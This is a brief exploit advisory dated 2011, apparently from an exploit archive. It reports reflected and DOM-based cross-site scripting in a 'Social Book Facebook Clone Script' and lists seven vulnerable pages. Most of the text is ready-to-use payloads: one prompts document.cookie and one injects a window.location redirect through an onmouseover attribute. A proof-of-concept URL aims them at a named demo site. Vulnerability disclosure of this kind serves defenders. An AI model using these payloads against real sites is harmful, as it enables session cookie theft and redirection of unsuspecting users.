# Exploit Title: Social Book Facebook Clone Script Reflected XSS Vulnerability
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr


ISSUE

XSS can be done using the command input

Vulnerable Page:
signup.php
lostpass.php
login.php
index.php
help_tos.php
help_contact.php
help.php

Example:
index.php"onmouseover=prompt(XSS CODE and DOM CODE)>



Exploit:
Reflected XSS: index.php/"onmouseover=prompt(document.cookie)>
DOM Based XSS:  
index.php/"onmouseover=prompt('window.location(http://google.com)')>


POC:
http://www.clonescriptsoftwaredemos.com/facebook/index.php/%22onmouseover=prompt('window.location(http://google.com)')%3E


Thanks,

Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr